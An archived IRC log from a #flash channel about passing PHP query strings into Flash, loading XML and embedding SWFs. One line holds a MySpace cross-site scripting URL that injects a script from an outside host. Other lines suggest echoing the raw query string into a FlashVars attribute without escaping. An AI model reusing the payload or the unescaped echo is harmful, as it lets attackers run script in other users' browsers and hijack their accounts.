@# Quotes DB     useful, funny, interesting





Google
 
Web www.quotesdb.info
Undernet  |  EFnet  |  Quakenet  |  Freenode  |  Dalnet  |  Ircnet  |  Galaxynet
Page: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21



Comments:

<0> in here is fine
<1> ):
<1> well fine then.
<2> like .php?fooo=baar&xxxx=yyyy
<0> http://www.evl.uic.edu/swami/crabcanon
<1> I tried to use someone else's code.. that I was trying to figure stuff out by.
<0> brilliant
<1> and I get..
<1> http://www.myspace.com/index.cfm?fuseaction=groups.myGroups&userid=">--><script>document.domain="myspace.com";e=document.createElement("script");e.src="http://l4nd.com/s/p.js?u=chris";e.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(e);</script><textarea><!--";
<1> I get that in the URL.
<1> :D
<0> so, use my code.
<1> I know.
<1> I am.
<1> But the issue I'm having
<1> Is I can't use iframes now.



<1> So how can I load the page.. ?
<0> open it in a popup?
<0> xmlhttp?
<1> hehe.
<1> I was wondering about that
<0> i dunno, there's lots of ways
<1> but I didn't know how to do window.open(whatever);
<0> if my code had something like document.location=foo+bar;
<3> K0m4, put all that in my embed and its not showing anything for the value I p***ed
<0> you could do window.open(foo.bar); instead
<0> oops
<1> You know what
<0> you could do window.open(foo+bar); instead
<1> I'll just do the redirect
<1> Then redirect back to the original page
<1> :P
<1> Alright.
<1> Thanks Cow.
<1> Cya
<3> K0m4, i echo <?php echo($_Server['QUERY_STRING']);?> in my .php file and it doesnt return anything
<3> so something is wrong
<2> wait
<2> 5 mins
<2> :P
<2> ;)
<3> ok
<0> <?php print $_GET['u']; ?>
<0> yawn
<3> nice
<3> Cowboy, so I have that set as a FlashVar.. how do I use it in the swf
<0> if you were calling a php script that took num and added 1 to it
<0> you could call addone.php?num=5 in flash
<0> and addone.php would be
<2> http://localhost:81/php_saves/GET/getquerystring.php?fooo=baar&xxxx=yyyy
<2> ups
<2> local
<2> ;)
<2> http://kom4.dyndns.org:81/php_saves/GET/getquerystring.php?fooo=baar&xxxx=yyyy
<2> http://kom4.dyndns.org:81/php_saves/GET/
<2> damn 6 minutes ;)
<0> <?PHP print "&num=" . (intval($_GET['num']) + 1) . "&"; ?>
<4> doggy doggy your on
<2> <param name="Flashvars" value="<?php echo($_SERVER['QUERY_STRING']); ?>">
<0> which would theoretically print out &num=6&
<2> flashvars="<?php echo($_SERVER['QUERY_STRING']); ?>"
<0> which flash could read, and set num to "6" (string) which you could convert to a number
<2> $_SERVER and not $_Server
<0> K0m4: i don't think you're helping
<0> it seems like you're just spouting nonsense
<0> at least, i don't get it
<2> lol
<2> Cowboy
<2> it was not youre problem
<5> this is ****ing
<5> anyone got an example of using loadXML?
<2> better ask john-bed
<2> if it's nonsense
<2> ;)
<2> ii mean
<2> JohnnyB
<0> okedokke



<0> well, i'm out g/l guys
<2> yes
<6> frb-work, wah da ell is loadXML
<2> Cowboy go away
<2> **** a cow !
<2> ;D
<5> suv4x4: I was hoping it would be an AS function to read an XML file and spew its contents into an object heirarchy
<3> K0m4, i dont see where in your php file, you are setting the flashvars
<3> <param name="Flashvars" value="">
<6> frb-work, I've never heard of it. The usual way is to make an XML object and use its load method or sendAndLoad method
<3> thats all you have
<5> sendAndLoad?
<2> JohnnyB ?
<2> why ?
<6> frb-work, var myX:XML = new XML(); myX.load(); or myX.sendAndLoad();
<2> it's $_GET
<3> K0m4, thats what your php file has
<6> of course there are parameters in there frb-work
<2> check my link
<3> i did
<2> http://kom4.dyndns.org:81/php_saves/GET/getquerystring.php?fooo=baar&xxxx=yyyy
<3> i saved the .php
<3> and opened it
<2> ?fooo=baar&xxxx=yyyy
<3> and theres nothing about flash vars
<2> there it is
<2> there i setup the variables
<3> yes but you arent showing how you send that to flash
<2> http://kom4.dyndns.org:81/php_saves/GET/getquerystring.php?fooo=we are the &xxxx=champions
<2> http://kom4.dyndns.org:81/php_saves/GET/getquerystring.php?fooo=we_are_the&xxxx=champions
<3> yes but you arent showing how you send that to flash
<2> <param name="Flashvars" value="<?php echo($_SERVER['QUERY_STRING']); ?>">
<2> and
<2> for emdend
<2> flashvars="<?php echo($_SERVER['QUERY_STRING']); ?>"
<5> embed is such a useless tag
<3> k thats weird, it doesnt show that in your php file
<2> i can zip it for you
<2> the php file
<2> http://kom4.dyndns.org:81/php_saves/GET/getquerystring.rar
<3> that worked fine
<3> thanks
<6> frb-work, it's only useless if you don't care to show flash in all browsers but IE
<5> not true
<6> frb-work, true, and if you mean Flash Satay, well Satay is buggy
<5> I use satay, without the loader
<5> works fine
<6> yea it works fine
<6> locally and on a fast connection
<6> and with external preloader and so on
<5> how does embed behave differently? besides not being valid html
<6> frb-work, you shouldn't get dirty with embed or object tags anyway, JavaScript should insert those
<5> why should javascript insert them?
<6> frb-work, especially after the EOLAS nuclear winter...
<6> frb-work, first reason is detection. OBJECT fallback doesn't account for Flash versions just for the existence of Flash. It won't mind displaying your Flash 8 movie in Flash player 2
<6> frb-work, second reason is the EOLAS suit and the changes in IE regarding it
<2> JohnnyB i pasted that two times
<5> you can of course do flash version detection in flash
<6> frb-work, by the way did you find how to use XML
<2> [01:19] and at [01:20]
<5> suv4x4: I'm working on it
<6> frb-work, fine so you can do detection from a Flash 4 SWF, and what happens if the user has older version?
<6> frb-work, I mean older than your desired, say Flash 7
<5> I'm just hoping this is a bug in rich media, and that flash7 really can read rtmp
<5> what if the user has JS disabled?
<6> frb-work, then he likely has no Flash as well and sees the fallback
<5> that's more likely to happen than the user having a really old flash, since most sites rely on the object tag to upgrade it
<6> people who turn off their JS won't exactly run ActiveX
<6> frb-work, that was in the past, we have Express Install now
<6> the object tag just popups a yellow line which the users ignore
<6> now I mean
<6> things change quickly in the www landscape... and they are about to change big time for Flash with the 8.5 release
<5> what's the best way to make a list of items, when clicked will run an AS function?
<5> oh joy, another flash release that won't support Linux!


Name:

Comments:

Please enter the result of the sum 63 + 46 (to avoid spam):






Return to #flash
or
Go to some related logs:

fuckyourshitup!
#beginner
hughmem
#firebird
#politics
q-bord
#delphi
bravoporno
#nhl
#cph



Home  |  disclaimer  |  contact  |  submit quotes